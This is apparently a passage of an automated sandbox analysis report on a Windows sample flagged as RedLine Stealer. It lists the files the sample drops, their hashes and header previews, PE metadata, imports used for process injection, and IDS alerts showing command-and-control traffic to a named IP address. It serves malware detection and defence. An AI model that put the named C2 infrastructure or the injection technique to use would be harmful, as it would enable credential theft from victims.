                                                                                                                                                                                                                      SSDEEP:384:JBf5WEhWye9HQpBj0HRN7tKQHRN7jsAXOVlTBr:zf5dMHqWtK87U
                                                                                                                                                                                                                      MD5:FE1096F1ADE3342F049921928327F553
                                                                                                                                                                                                                      SHA1:118FB451AB006CC55F715CDF3B5E0C49CF42FBE0
                                                                                                                                                                                                                      SHA-256:88D3918E2F063553CEE283306365AA8701E60FB418F37763B4719F9974F07477
                                                                                                                                                                                                                      SHA-512:0A982046F0C93F68C03A9DD48F2BC7AEE68B9EEBEAEA01C3566B2384D0B8A231570E232168D4608A09136BCB2B1489AF802FD0C25348F743F0C1C8955EDD41C1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..d...#.NV.........." .........................................................0.......0....`.........................................`...^............ ...................A..............8............................................................................rdata..t...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):841697
                                                                                                                                                                                                                      Entropy (8bit):5.484581034394053
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:fhidp/tosQNRs54PK4IM7Vw59bfCEnXTR32k:fhidp/tosQNRs54PK4Ip9F5
                                                                                                                                                                                                                      MD5:F4981249047E4B7709801A388E2965AF
                                                                                                                                                                                                                      SHA1:42847B581E714A407A0B73E5DAB019B104EC9AF2
                                                                                                                                                                                                                      SHA-256:B191E669B1C715026D0732CBF8415F1FF5CFBA5ED9D818444719D03E72D14233
                                                                                                                                                                                                                      SHA-512:E8EF3FB3C9D5EF8AE9065838B124BA4920A3A1BA2D4174269CAD05C1F318BC9FF80B1C6A6C0F3493E998F0587EF59BE0305BC92E009E67B82836755470BC1B13
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:PK..........!...7............._bootlocale.pycU....................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin....A

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\libcrypto-1_1.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3381792
                                                                                                                                                                                                                      Entropy (8bit):6.094908167946797
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
                                                                                                                                                                                                                      MD5:BF83F8AD60CB9DB462CE62C73208A30D
                                                                                                                                                                                                                      SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
                                                                                                                                                                                                                      SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
                                                                                                                                                                                                                      SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...K...3..[...3..[...3..[...3..[...3..U...3...3..{3..qZ...3..qZ..1..qZ...3..qZf..3..qZ...3..Rich.3..................PE..d....k.].........." ......$..........r....................................... 4.......4...`..............................................f...Z3.@.....3.|.....1.......3. .....3..O..P-,.8............................-,..............P3..............................text...g.$.......$................. ..`.rdata.......0$.......$.............@..@.data...Ax....1..*....0.............@....pdata........1.......1.............@..@.idata...#...P3..$....2.............@..@.00cfg........3.......2.............@..@.rsrc...|.....3.......2.............@..@.reloc...x....3..z....3.............@..B........................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\libffi-7.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):32792
                                                                                                                                                                                                                      Entropy (8bit):6.372276555451265
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                                                                                                                                                      MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                                                                                                                                                      SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                                                                                                                                                      SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                                                                                                                                                      SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..{]A.{]A.{]A...A.{]A..\@.{]A..\@.{]A.{\A.{]A..X@.{]A..Y@.{]A..^@.{]A..Y@.{]A..^@.{]A..]@.{]A.._@.{]ARich.{]A........................PE..d.....\.........." .....F...$.......I...................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\python38.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4183112
                                                                                                                                                                                                                      Entropy (8bit):6.420172758698049
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                                      MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                                      SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                                      SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                                      SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\select.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):26696
                                                                                                                                                                                                                      Entropy (8bit):6.101296746249305
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                                      MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                                      SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                                      SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                                      SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\ucrtbase.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1046080
                                                                                                                                                                                                                      Entropy (8bit):6.649151787942547
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                                                                                                                                                      MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                                                                                                                                                      SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                                                                                                                                                      SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                                                                                                                                                      SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI81442\unicodedata.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1096264
                                                                                                                                                                                                                      Entropy (8bit):5.343512979675051
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                                      MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                                      SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                                      SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                                      SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\uFVgJVXaEU.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):312320
                                                                                                                                                                                                                      Entropy (8bit):6.296604624276584
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:RJRGyoPwcMZAwSYQ1rL4OgbDetMfhiRdsLoOJ0tYRVlOPAKePNO4:dGyoPwcMZhnQ1rL4OKDeohi3sLo7WY4
                                                                                                                                                                                                                      MD5:BFAE2C479A12CBC660E580A84D3E3CE0
                                                                                                                                                                                                                      SHA1:0891B36B510049EF811DEB93FCDACFDFDBFC406A
                                                                                                                                                                                                                      SHA-256:2EA05B5B9847FB2E777F4433A2F73CBA12B96A8B074AB83179CBAFBC49963665
                                                                                                                                                                                                                      SHA-512:CE53E1E95EEE76F0F49E29B91CE27C35C972980EBD8E3EA2DA387AF40C667CAE457288E183447E0513ED1C9EC0C4DE5AF6F81DADDD77C533C437EE8496D59085
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A..A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d...O.`g.........."......:...4.......4.........@..........................................@.................................................pr..(.......(.......L....................................................................P..X............................text....8.......:.................. ..`.rdata...#...P...$...>..............@..@.data...............................@....pdata..L............b..............@..@.rsrc...(............f..............@..@.x64.....`.......Z...j..................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe:Zone.Identifier

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\uFVgJVXaEU.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Entropy (8bit):6.296604624276584
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                      File name:uFVgJVXaEU.exe
                                                                                                                                                                                                                      File size:312'320 bytes
                                                                                                                                                                                                                      MD5:bfae2c479a12cbc660e580a84d3e3ce0
                                                                                                                                                                                                                      SHA1:0891b36b510049ef811deb93fcdacfdfdbfc406a
                                                                                                                                                                                                                      SHA256:2ea05b5b9847fb2e777f4433a2f73cba12b96a8b074ab83179cbafbc49963665
                                                                                                                                                                                                                      SHA512:ce53e1e95eee76f0f49e29b91ce27c35c972980ebd8e3ea2da387af40c667cae457288e183447e0513ed1c9ec0c4de5af6f81daddd77c533c437ee8496d59085
                                                                                                                                                                                                                      SSDEEP:6144:RJRGyoPwcMZAwSYQ1rL4OgbDetMfhiRdsLoOJ0tYRVlOPAKePNO4:dGyoPwcMZhnQ1rL4OKDeohi3sLo7WY4
                                                                                                                                                                                                                      TLSH:F2645B1B248162CFF3987273D01499B4D4FEE87556B64AA9A120F6FB171B2C34F11EB2
                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A...A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d...O.`g.........."......:...4.......4.....

                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Entrypoint:0x14000340c
                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                      Time Stamp:0x67607F4F [Mon Dec 16 19:28:15 2024 UTC]
                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                      OS Version Minor:2
                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                      File Version Minor:2
                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                      Subsystem Version Minor:2
                                                                                                                                                                                                                      Import Hash:75a1ace6800a8990783719f99f2f799f

                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      sub esp, 00000298h
                                                                                                                                                                                                                      call 00007FA42106AEB9h
                                                                                                                                                                                                                      call 00007FA42106CB24h
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CD9Ah
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004F5Ch]
                                                                                                                                                                                                                      call 00007FA42106DA08h
                                                                                                                                                                                                                      mov dword ptr [esp+30h], 00000104h
                                                                                                                                                                                                                      mov edx, dword ptr [esp+30h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FA42106D5F2h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea edx, dword ptr [00003A92h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FA42106D811h
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CDE1h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      mov ecx, dword ptr [00004BD5h]
                                                                                                                                                                                                                      call 00007FA42106DB11h
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      jne 00007FA42106CDA5h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [00003A82h]
                                                                                                                                                                                                                      call 00007FA42106DAFEh
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CD9Ah
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004D36h]
                                                                                                                                                                                                                      call 00007FA42106CBA2h
                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                      cmp eax, 01h
                                                                                                                                                                                                                      je 00007FA42106CD9Fh
                                                                                                                                                                                                                      mov ecx, 0000C350h
                                                                                                                                                                                                                      call dword ptr [00004CCFh]
                                                                                                                                                                                                                      jmp 00007FA42106CD7Eh
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004D15h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea edx, dword ptr [00003A56h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FA42106D7ADh
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CDCEh
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [00003A59h]
                                                                                                                                                                                                                      call 00007FA42106DAADh
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FA42106CD9Ah

                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                      • [C++] VS2010 build 30319
                                                                                                                                                                                                                      • [RES] VS2010 build 30319
                                                                                                                                                                                                                      • [LNK] VS2010 build 30319

                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x72700x28.rdata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x328.rsrc
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x90000x24c.pdata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x50000x58.rdata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                      .text0x10000x380b0x3a009692721530d9adbcb9c83b7b72f06f6cFalse0.4084051724137931data5.45635698478597IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .rdata0x50000x23b20x24007798eead5e2b85a3a847eae777ecdddbFalse0.4345703125SysEx File -5.401627140137092IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .data0x80000x6880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .pdata0x90000x24c0x400190b730ab38c29046d3b59082a6f2de3False0.349609375data2.608228609717788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .rsrc0xa0000x3280x400b20114eeb22f771b9c36da6e2ac337ceFalse0.361328125data2.6200573070054105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .x640xb0000x460000x45a00c812321de5c7baa3965689ef4cbc47f1False0.46156867145421904data6.104829327040626IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                      RT_VERSION0xa0600x2c4dataEnglishUnited States0.4717514124293785

                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                      KERNEL32.dllGetProcAddress, GetModuleHandleA, CloseHandle, WriteProcessMemory, VirtualAllocEx, OpenProcess, GetSystemInfo, LoadLibraryA, GetVersionExW, WaitForMultipleObjects

                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                      2024-12-17T10:15:02.108574+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.849708185.81.68.14780TCP
                                                                                                                                                                                                                      2024-12-17T10:15:04.677281+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.849709185.81.68.14780TCP
                                                                                                                                                                                                                      2024-12-17T10:15:05.892902+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:05.892902+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:06.336483+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.81.68.1471912192.168.2.849710TCP
                                                                                                                                                                                                                      2024-12-17T10:15:11.498795+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:12.125807+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
